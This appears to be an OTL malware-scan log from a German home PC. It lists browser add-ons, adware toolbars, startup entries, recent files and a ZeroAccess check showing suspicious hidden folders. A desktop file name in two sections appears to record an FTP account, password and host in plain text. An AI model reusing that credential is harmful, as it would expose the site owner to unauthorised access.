FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins

 

[2011.02.18 19:21:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\Extensions

[2013.02.12 14:00:46 | 000,000,000 | ---D | M] (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions

[2011.06.09 19:34:49 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}

[2011.02.18 19:26:18 | 000,000,000 | ---D | M] (HP Detect) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2}

[2012.04.12 10:27:18 | 000,000,000 | ---D | M] (FireJump) -- C:\Users\TuS\AppData\Roaming\mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\firejump@firejump.net

[2013.02.12 14:00:46 | 000,083,610 | ---- | M] () (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\extensions\FirefoxToolbar@gutscheindoktor.de.xpi

[2012.09.13 21:26:35 | 000,698,867 | ---- | M] () (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi

[2011.09.05 14:10:55 | 000,002,071 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{141EC851-F454-4579-9174-C9E9E1D88D64}.xml

[2011.09.05 14:10:55 | 000,002,182 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{17FFFFE5-2985-4E65-A59A-5F718CA14B4E}.xml

[2011.09.05 14:10:55 | 000,001,864 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\mozilla\firefox\profiles\5j2bf9y8.default\searchplugins\{1AAA6855-731F-495F-ADA7-2516FE8EF2F7}.xml

[2013.02.08 16:39:05 | 000,000,000 | ---D | M] (No name found) -- C:\Programme\Mozilla Firefox\extensions

[2013.02.08 16:39:05 | 000,000,000 | ---D | M] (Skype extension) -- C:\Programme\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}

[2013.02.08 16:39:06 | 000,000,000 | ---D | M] (Java Console) -- C:\Programme\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}

[2013.02.08 16:39:03 | 000,000,000 | ---D | M] (Hotspot Shield Helper (Please allow this installation)) -- C:\Programme\Mozilla Firefox\extensions\afurladvisor@anchorfree.com

[2013.02.08 16:39:04 | 000,000,000 | ---D | M] (Modul zur Link-Untersuchung) -- C:\Programme\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak

[2013.02.08 16:40:09 | 000,262,552 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll

[2012.06.30 07:09:43 | 000,001,392 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\amazondotcom-de.xml

[2012.10.05 18:41:04 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml

[2012.06.30 07:09:43 | 000,001,153 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\eBay-de.xml

[2012.06.30 07:09:43 | 000,006,805 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\leo_ende_de.xml

[2012.06.30 07:09:43 | 000,001,178 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-de.xml

[2012.06.30 07:09:43 | 000,001,105 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-de.xml

 

O1 HOSTS File: ([2012.06.29 16:08:36 | 000,000,705 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts

O2 - BHO: (Babylon toolbar helper) - {2EECD738-5844-4a99-B4B6-146BF802613B} - C:\Programme\BabylonToolbar\BabylonToolbar\1.8.3.8\bh\BabylonToolbar.dll (Babylon BHO)

O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O2 - BHO: (Hotspot Shield Toolbar) - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)

O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O2 - BHO: (Hotspot Shield Class) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Programme\Hotspot Shield\HssIE\HssIE.dll (AnchorFree Inc.)

O3 - HKLM\..\Toolbar: (Babylon Toolbar) - {98889811-442D-49dd-99D7-DC866BE87DBC} - C:\Programme\BabylonToolbar\BabylonToolbar\1.8.3.8\BabylonToolbarTlbr.dll (Babylon Ltd.)

O3 - HKLM\..\Toolbar: (Hotspot Shield Toolbar) - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)

O3 - HKCU\..\Toolbar\WebBrowser: (Hotspot Shield Toolbar) - {C95A4E8E-816D-4655-8C79-D736DA1ADB6D} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)

O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)

O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG)

O4 - HKLM..\Run: [Ocs_SM] C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizer.exe (OCS)

O4 - HKLM..\Run: [SoundMAX] C:\Program Files\Analog Devices\SoundMAX\soundmax.exe (Analog Devices, Inc.)

O4 - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)

O4 - HKCU..\Run: [RocketDock] C:\Program Files\RocketDock\RocketDock.exe ()

O4 - HKCU..\Run: [WMPNSCFG] C:\Programme\Windows Media Player\wmpnscfg.exe (Microsoft Corporation)

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 28

O9 - Extra Button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O9 - Extra 'Tools' menuitem : Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)

O13 - gopher Prefix: missing

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Reg Error: Value error.)

O16 - DPF: {CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Java Plug-in 1.6.0_35)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_35-windows-i586.cab (Java Plug-in 10.10.2)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.2.1

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{AC1F1EA0-BD7D-4511-87CD-7023DBE3F1CA}: DhcpNameServer = 192.168.2.1

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BEB5FB91-4729-4169-BB55-67335B073F1B}: DhcpNameServer = 8.8.8.8

O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Programme\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)

O24 - Desktop WallPaper: C:\Users\TuS\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg

O24 - Desktop BackupWallPaper: C:\Users\TuS\AppData\Roaming\Microsoft\Windows Photo Gallery\Hintergrundbild der Windows-Fotogalerie.jpg

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2006.09.18 22:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O32 - AutoRun File - [2011.02.22 17:59:49 | 000,000,000 | -H-D | M] - G:\autorun -- [ NTFS ]

O32 - Unable to obtain root file information for disk G:\

O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun

O33 - MountPoints2\{000f3f6b-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe

O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell - "" = AutoRun

O33 - MountPoints2\{000f3f8e-1350-11e1-bfdb-0022644e6fa0}\Shell\AutoRun\command - "" = G:\AutoRun.exe

O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell - "" = AutoRun

O33 - MountPoints2\{1e273fd7-b186-11e1-ae3c-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a

O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell - "" = AutoRun

O33 - MountPoints2\{b11d1c81-a27f-11e0-9455-0022644e6fa0}\Shell\AutoRun\command - "" = H:\LaunchU3.exe -a

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

 

ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)

ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - 

ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 11.0

ActiveX: {25FFAAD0-F4A3-4164-95FF-4461E9F35D51} - .NET Framework

ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack

ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework

ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE

ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - 

ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx

ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help

ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6

ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools

ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements

ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player

ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access

ActiveX: {73FA19D0-2D75-11D2-995D-00C04F98BBC9} - Webordner

ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7

ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\system32\ie4uinit.exe -BaseSettings

ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install

ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding

ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts

ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1

ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help

ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface

ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\Windows\system32\unregmp2.exe /ShowWMP

ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\system32\ie4uinit.exe -UserIconConfig

ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP

 

NetSvcs: FastUserSwitchingCompatibility -  File not found

NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation)

NetSvcs: Nla -  File not found

NetSvcs: Ntmssvc -  File not found

NetSvcs: NWCWorkstation -  File not found

NetSvcs: Nwsapagent -  File not found

NetSvcs: SRService -  File not found

NetSvcs: WmdmPmSp -  File not found

NetSvcs: LogonHours -  File not found

NetSvcs: PCAudit -  File not found

NetSvcs: helpsvc -  File not found

NetSvcs: uploadmgr -  File not found

 

 

CREATERESTOREPOINT

Restore point Set: OTL Restore Point

 
 ========== Files/Folders - Created Within 30 Days ==========

 

[2013.02.18 23:27:39 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe

[2013.02.18 23:13:39 | 000,000,000 | ---D | C] -- C:\Users\TuS\Desktop\twentytwelve-alt

[2013.02.18 22:35:01 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Notepad++

[2013.02.18 22:35:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++

[2013.02.18 22:34:57 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Notepad++

[2013.02.18 22:34:57 | 000,000,000 | ---D | C] -- C:\Program Files\Notepad++

[2013.02.08 16:39:00 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox

[2013.01.29 19:19:29 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MP3Gain

[2013.01.29 19:19:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MP3Gain

[2013.01.29 19:19:25 | 000,000,000 | ---D | C] -- C:\Program Files\MP3Gain

[2013.01.24 20:59:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime

[2013.01.24 20:59:07 | 000,000,000 | ---D | C] -- C:\Program Files\QuickTime

[2013.01.24 18:46:22 | 000,000,000 | ---D | C] -- C:\Users\TuS\AppData\Roaming\Malwarebytes

[2013.01.24 18:46:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware

[2013.01.24 18:45:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes

[2013.01.24 18:45:55 | 000,021,104 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\System32\drivers\mbam.sys

[2013.01.24 18:45:55 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware

[1 C:\*.tmp files -> C:\*.tmp -> ]

 
 ========== Files - Modified Within 30 Days ==========

 

[2013.02.18 23:30:06 | 000,000,000 | ---- | M] () -- C:\Users\TuS\Desktop\250402-ftp               H7gG74HuBg7FJ            Tus-schildgen.de

[2013.02.18 23:27:47 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe

[2013.02.18 23:19:19 | 000,005,312 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0

[2013.02.18 23:19:19 | 000,005,312 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0

[2013.02.18 22:58:03 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[2013.02.18 21:29:48 | 000,021,751 | ---- | M] () -- C:\Users\TuS\.recently-used.xbel

[2013.02.18 19:18:44 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013.02.18 19:18:38 | 2073,313,280 | -HS- | M] () -- C:\hiberfil.sys

[2013.02.18 17:31:31 | 000,000,012 | ---- | M] () -- C:\Windows\bthservsdp.dat

[2013.02.18 14:52:59 | 000,628,742 | ---- | M] () -- C:\Windows\System32\perfh007.dat

[2013.02.18 14:52:59 | 000,595,996 | ---- | M] () -- C:\Windows\System32\perfh009.dat

[2013.02.18 14:52:59 | 000,126,260 | ---- | M] () -- C:\Windows\System32\perfc007.dat

[2013.02.18 14:52:59 | 000,104,070 | ---- | M] () -- C:\Windows\System32\perfc009.dat

[2013.02.16 21:22:17 | 000,305,904 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT

[2013.01.27 13:11:19 | 000,068,096 | ---- | M] () -- C:\Users\TuS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

[2013.01.23 22:05:03 | 000,000,496 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\burnaware.ini

[1 C:\*.tmp files -> C:\*.tmp -> ]

 
 ========== Files Created - No Company Name ==========

 

[2013.02.18 23:30:06 | 000,000,000 | ---- | C] () -- C:\Users\TuS\Desktop\250402-ftp               H7gG74HuBg7FJ            Tus-schildgen.de

[2013.02.18 21:29:48 | 000,021,751 | ---- | C] () -- C:\Users\TuS\.recently-used.xbel

[2012.10.21 13:20:44 | 000,000,496 | ---- | C] () -- C:\Users\TuS\AppData\Roaming\burnaware.ini

[2012.10.16 11:03:56 | 000,000,000 | ---- | C] () -- C:\Windows\System32\cd.dat

[2012.09.17 18:11:49 | 000,438,272 | ---- | C] () -- C:\Windows\System32\PaintX.dll

[2012.09.11 20:07:01 | 000,224,118 | ---- | C] () -- C:\Users\TuS\01108_yaquinaheadlighthouse_1280x800.jpg

[2012.06.03 16:11:50 | 000,000,021 | ---- | C] () -- C:\Users\TuS\.gtk-bookmarks

[2012.05.10 18:25:22 | 000,201,488 | ---- | C] () -- C:\Windows\System32\MACD32.DLL

[2012.05.10 18:25:22 | 000,144,144 | ---- | C] () -- C:\Windows\System32\MASE32.DLL

[2012.05.10 18:25:22 | 000,141,584 | ---- | C] () -- C:\Windows\System32\MAMC32.DLL

[2012.05.10 18:25:22 | 000,063,248 | ---- | C] () -- C:\Windows\System32\MASD32.DLL

[2012.05.10 18:25:22 | 000,033,040 | ---- | C] () -- C:\Windows\System32\MA32.DLL

[2012.04.03 11:20:55 | 000,000,403 | ---- | C] () -- C:\Windows\ODBC.INI

[2011.02.21 18:56:09 | 000,117,248 | ---- | C] () -- C:\Windows\System32\EhStorAuthn.dll

[2011.02.21 18:56:09 | 000,107,612 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin

[2011.02.21 18:18:14 | 000,018,904 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin

[2011.02.19 18:56:07 | 000,017,089 | ---- | C] () -- C:\Users\TuS\AppData\Roaming\UserTile.png

[2011.02.18 17:57:29 | 000,068,096 | ---- | C] () -- C:\Users\TuS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

[2011.02.18 16:50:52 | 000,001,356 | ---- | C] () -- C:\Users\TuS\AppData\Local\d3d9caps.dat

 
 ========== ZeroAccess Check ==========

 

[2011.11.18 21:23:34 | 000,002,048 | -HS- | M] () -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\@

[2011.11.18 21:23:34 | 000,000,000 | -HSD | M] -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\L

[2012.08.28 22:41:46 | 000,000,000 | -HSD | M] -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\U

[2012.08.28 22:11:24 | 000,001,712 | ---- | M] () -- C:\Users\TuS\AppData\Local\{ff24043d-55f8-5ce9-a20a-8337d9b4b888}\U\00000001.@

[2006.11.02 13:51:16 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

 

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

 

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2012.06.08 18:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.04.11 07:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

"" = %systemroot%\system32\wbem\wbemess.dll -- [2009.04.11 07:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

 
 ========== LOP Check ==========

 

[2012.11.30 14:56:09 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Babylon

[2012.05.16 18:58:18 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\DesktopIconForAmazon

[2013.02.18 23:28:31 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\FileZilla

[2013.02.18 21:29:48 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\gtk-2.0

[2011.09.05 16:12:15 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\ICQ

[2011.08.18 01:05:18 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\InfraRecorder

[2013.02.01 23:45:36 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Mp3tag

[2013.02.18 22:57:06 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Notepad++

[2011.09.05 14:10:44 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\OCS

[2011.06.09 20:22:32 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\OpenOffice.org

[2011.09.05 14:10:55 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Opera

[2011.02.19 18:56:06 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\PeerNetworking

[2012.07.02 09:05:32 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\redsn0w

[2011.07.01 11:08:57 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Scribus

[2013.01.05 15:53:20 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\TeamViewer

[2011.07.01 10:56:46 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Thunderbird

[2011.11.20 09:24:30 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Verbindungsassistent

[2012.06.29 11:29:30 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\WindSolutions

 
 ========== Purity Check ==========

 

 

 
 ========== Custom Scans ==========

 
 < %SYSTEMDRIVE%\*. >

[2011.02.18 16:51:12 | 000,000,000 | -HSD | M] -- C:\$Recycle.Bin

[2012.09.06 17:40:28 | 000,000,000 | ---D | M] -- C:\Backup 05.09.2012

[2009.07.18 19:38:55 | 000,000,000 | ---D | M] -- C:\BlueByte

[2011.02.21 19:28:10 | 000,000,000 | -HSD | M] -- C:\boot

[2013.02.16 19:05:44 | 000,000,000 | -HSD | M] -- C:\Config.Msi

[2006.11.02 13:59:44 | 000,000,000 | -HSD | M] -- C:\Documents and Settings

[2009.02.05 12:28:25 | 000,000,000 | -HSD | M] -- C:\Dokumente und Einstellungen

[2008.07.12 07:16:50 | 000,000,000 | -H-D | M] -- C:\hp

[2011.02.18 17:57:39 | 000,000,000 | ---D | M] -- C:\Intel

[2012.04.04 13:49:05 | 000,000,000 | -H-D | M] -- C:\kleaner.tmp

[2012.05.21 14:38:33 | 000,000,000 | ---D | M] -- C:\LuPO

[2012.09.17 19:09:03 | 000,000,000 | ---D | M] -- C:\Meine Webseiten

[2009.02.05 16:35:24 | 000,000,000 | RH-D | M] -- C:\MSOCache

[2008.01.21 03:43:50 | 000,000,000 | ---D | M] -- C:\PerfLogs

[2013.02.18 22:34:57 | 000,000,000 | R--D | M] -- C:\Program Files

[2013.02.18 19:20:39 | 000,000,000 | -H-D | M] -- C:\ProgramData

[2009.02.05 12:28:25 | 000,000,000 | -HSD | M] -- C:\Programme

[2013.02.11 19:28:12 | 000,000,000 | ---D | M] -- C:\SPG-Verein

[2011.02.19 18:29:32 | 000,000,000 | ---D | M] -- C:\Swsetup

[2013.02.18 23:31:32 | 000,000,000 | -HSD | M] -- C:\System Volume Information

[2011.02.18 17:15:31 | 000,000,000 | -H-D | M] -- C:\System.sav

[2012.04.03 11:13:07 | 000,000,000 | ---D | M] -- C:\Temp

[2011.02.18 16:50:49 | 000,000,000 | R--D | M] -- C:\Users

[2012.12.14 09:34:41 | 000,000,000 | ---D | M] -- C:\Windows

 
 < %PROGRAMFILES%\*.exe >

 
 < %LOCALAPPDATA%\*.exe >

 
 < %systemroot%\*. /mp /s >

 
 < C:\Windows\system32\*.tsp >

[2006.11.02 10:44:49 | 000,031,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\hidphone.tsp

[2006.11.02 10:44:49 | 000,038,400 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\kmddsp.tsp

[2006.11.02 10:44:49 | 000,049,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ndptsp.tsp

[2006.11.02 10:44:49 | 000,081,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\remotesp.tsp

[2009.04.11 07:27:17 | 000,280,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\unimdm.tsp

[2006.11.02 13:58:10 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT

[2006.11.02 13:58:10 | 000,032,534 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT

[2012.06.10 19:25:39 | 000,000,884 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job

 
 < MD5 for: AGP440.SYS  >

[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_51b95d75\AGP440.sys

[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_f750e484\AGP440.sys

[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6001.18000_none_ba12ed3bbeb0d97a\AGP440.sys

[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6002.18005_none_bbfe6647bbd2a4c6\AGP440.sys

